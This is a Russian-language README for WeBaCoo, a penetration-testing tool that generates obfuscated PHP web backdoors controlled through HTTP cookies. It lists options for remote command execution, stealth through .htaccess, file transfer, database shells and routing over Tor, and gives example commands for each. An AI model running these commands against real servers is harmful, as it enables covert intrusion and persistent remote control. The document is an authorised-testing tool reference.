
Набор скриптов для веб-бэкдора через куки
| | | | | ___ \ / __ \
| | | | | |/ / __ | / / ___ ___
| |/| |/ _ \ ___ / ` | | / _ \ / _ \
\ /\ / __/ |/ / (| | _/\ () | (_) |
/ / __/ _,|_/_/ _/
Web Backdoor Cookie Script-Kit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Автор: Anestis Bechtsoudis @ bechtsoudis.com Copyright (C) 2011-2012 Anestis Bechtsoudis
Инструмент предназначен только для тестирования и может использоваться только при наличии строгого согласия. Не используйте его в незаконных целях.
Любые модификации, изменения или доработки данного приложения допустимы, однако любые публичные релизы, использующие этот код, должны быть одобрены его создателем. Дополнительную информацию см. в файле LICENSE.
Если вы не хотите устанавливать libio-socket-socks-perl для поддержки прокси Tor, закомментируйте строку 25 в webacoo.pl.
webacoo.pl [опции]
Опции: -g Сгенерировать код бэкдора (требуется -o)
-f ФУНКЦИЯ Используемая системная функция PHP ФУНКЦИЯ 1: system (по умолчанию) 2: shell_exec 3: exec 4: passthru 5: popen
-o ВЫВОД Имя выходного файла сгенерированного бэкдора
-r Вернуть необфусцированный код бэкдора
-t Установить удалённое «терминальное» соединение (требуется -u)
-u URL URL бэкдора
-e КОМАНДА Режим выполнения одной команды (требуется -t и -u)
-m МЕТОД Используемый HTTP-метод (по умолчанию «GET»)
-c ИМЯ_КУКИ Имя cookie (по умолчанию «M-cookie»)
-d РАЗДЕЛИТЕЛЬ Разделитель (по умолчанию случайный новый для каждого запроса)
-a AGENT HTTP-заголовок User-Agent (по умолчанию существует)
-p ПРОКСИ Использовать прокси (tor, ip:port или user:pass:ip:port)
-v УРОВЕНЬ Уровень подробности вывода УРОВЕНЬ 0: без дополнительной информации (по умолчанию) 1: вывод HTTP-заголовков 2: вывод HTTP-заголовков и данных
-l ЖУРНАЛ Записывать активность в файл
-h Показать справку и выйти
update Проверить наличие обновлений и применить, если есть
Начиная с версии 0.2.1 добавлена поддержка модулей расширения, которые предоставляют дополнительные возможности для WeBaCoo. В терминальном режиме вы можете выполнить 'load', чтобы вывести список доступных модулей и инициализировать нужный из списка. Введя 'unload', вы вернетесь в исходный терминальный режим.
Доступные модули расширения: o mysql-cli Модуль командной строки MySQL o psql-cli Модуль командной строки Postgres o download Модуль скачивания файлов с использованием HTTP Post o upload Модуль загрузки файлов с выводом через stdout с помощью 'od' и 'xxd' o stealth Модуль повышения скрытности через обработку .htaccess
Создать обфусцированный бэкдор 'backdoor.php' с настройками по умолчанию ./webacoo.pl -g -o backdoor.php
Создать необфусцированный бэкдор 'raw-backdoor.php' с использованием функции 'passthru' ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
Установить «терминальное» соединение с удалённым хостом с настройками по умолчанию ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
Установить «терминальное» соединение с удалённым хостом с заданными параметрами ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"
Установить «терминальное» соединение с удалённым хостом через локальный HTTP-прокси ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
Установить «терминальное» соединение с удалённым хостом через HTTP-прокси с базовой аутентификацией ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
Установить «терминальное» соединение с удалённым хостом через Tor с ведением журнала ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt